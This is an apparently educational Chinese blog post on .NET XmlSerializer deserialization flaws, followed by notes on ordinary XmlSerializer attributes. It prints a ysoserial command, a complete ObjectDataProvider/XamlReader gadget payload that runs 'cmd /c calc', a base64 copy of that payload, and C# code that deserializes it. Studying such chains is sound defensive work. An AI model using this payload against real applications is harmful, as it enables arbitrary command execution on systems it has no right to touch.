XmlSerializer反序列化漏洞
https://www.cnblogs.com/nice0e3/p/16942833.html#%E5%88%A9%E7%94%A8%E9%93%BE%E8%B0%83%E8%AF%95
https://www.anquanke.com/post/id/172316
XmlSerializer 在 net 中 用于序列化对象为xml,反序列化xml文件为类对象 如果程序开发人员使用Type类的静态方法获取外界数据,并调用Deserialize反序列化xml数据就会触发反序列化漏洞攻击
通过yso 生成构造链
ysoserial.exe -g ObjectDataProvider -c calc -f xmlserializer
<?xml version="1.0"?>
<root type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" >
<ExpandedElement/>
<ProjectedProperty0>
<MethodName>Parse</MethodName>
<MethodParameters>
<anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">
<![CDATA[<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:d="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:b="clr-namespace:System;assembly=mscorlib" xmlns:c="clr-namespace:System.Diagnostics;assembly=system"><ObjectDataProvider d:Key="" ObjectType="{d:Type c:Process}" MethodName="Start"><ObjectDataProvider.MethodParameters><b:String>cmd</b:String><b:String>/c calc</b:String></ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]>
</anyType>
</MethodParameters>
<ObjectInstance xsi:type="XamlReader"></ObjectInstance>
</ProjectedProperty0>
</ExpandedWrapperOfXamlReaderObjectDataProvider>
</root>
static void Main(string[] args)
{
//反序列化
String p = "PEV4cGFuZGVkV3JhcHBlck9mWGFtbFJlYWRlck9iamVjdERhdGFQcm92aWRlciB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczp4c2Q9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hIiA+CiAgICAgICAgPEV4cGFuZGVkRWxlbWVudC8+CiAgICAgICAgPFByb2plY3RlZFByb3BlcnR5MD4KICAgICAgICAgICAgPE1ldGhvZE5hbWU+UGFyc2U8L01ldGhvZE5hbWU+CiAgICAgICAgICAgIDxNZXRob2RQYXJhbWV0ZXJzPgogICAgICAgICAgICAgICAgPGFueVR5cGUgeG1sbnM6eHNpPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYS1pbnN0YW5jZSIgeG1sbnM6eHNkPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYSIgeHNpOnR5cGU9InhzZDpzdHJpbmciPgogICAgICAgICAgICAgICAgICAgIDwhW0NEQVRBWzxSZXNvdXJjZURpY3Rpb25hcnkgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiIgeG1sbnM6ZD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiIHhtbG5zOmI9ImNsci1uYW1lc3BhY2U6U3lzdGVtO2Fzc2VtYmx5PW1zY29ybGliIiB4bWxuczpjPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1zeXN0ZW0iPjxPYmplY3REYXRhUHJvdmlkZXIgZDpLZXk9IiIgT2JqZWN0VHlwZT0ie2Q6VHlwZSBjOlByb2Nlc3N9IiBNZXRob2ROYW1lPSJTdGFydCI+PE9iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPjxiOlN0cmluZz5jbWQ8L2I6U3RyaW5nPjxiOlN0cmluZz4vYyBjYWxjPC9iOlN0cmluZz48L09iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPjwvT2JqZWN0RGF0YVByb3ZpZGVyPjwvUmVzb3VyY2VEaWN0aW9uYXJ5Pl1dPgogICAgICAgICAgICAgICAgPC9hbnlUeXBlPgogICAgICAgICAgICA8L01ldGhvZFBhcmFtZXRlcnM+CiAgICAgICAgICAgIDxPYmplY3RJbnN0YW5jZSB4c2k6dHlwZT0iWGFtbFJlYWRlciI+PC9PYmplY3RJbnN0YW5jZT4KICAgICAgICA8L1Byb2plY3RlZFByb3BlcnR5MD4KICAgIDwvRXhwYW5kZWRXcmFwcGVyT2ZYYW1sUmVhZGVyT2JqZWN0RGF0YVByb3ZpZGVyPg==";
byte[] vs = Convert.FromBase64String(p);
string xml = Encoding.UTF8.GetString(vs);
XmlSerializer serializer = new XmlSerializer(Type.GetType("System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"));
using (StringReader rdr = new StringReader(xml))
{
serializer.Deserialize(rdr);
}
// Console.WriteLine(tclass.Classname);
}
XmlSerializer序列化
System.Xml.Serialization 命名空间下的XmlSerializer类可以将 XML 文档绑定到 .NET 类的实例,有一点需要注意它只能把对象的公共属性和公共字段转换为XML元素或属性,并且由两个方法组成:Serialize() 用于从对象实例生成 XML;Deserialize() 用于将 XML 文档分析成对象图,被序列化的数据可以是数据、字段、数组、以及XmlElement和XmlAttribute对象格式的内嵌XML
[XmlRoot]
public class Testclass
{
private String classname;
private String name;
private int age;
[XmlAttribute]
public String Classname { get => classname; set => classname = value; }
[XmlElement]
public String Name { get => name; set => name = value; }
[XmlElement]
public int Age { get => age; set => age = value; }
public override string ToString()
{
return base.ToString();
}
}
这里有几个属性需要注意一下
[XmlRoot] 是xml的根结点 ,一般是类名 定义在类文件的上面
XmlElement 指定属性要序列化为元素 也就是
标签:xml,System,学习,new,XmlSerializer,序列化,Type
From: https://www.cnblogs.com/xxxxuan/p/17074078.html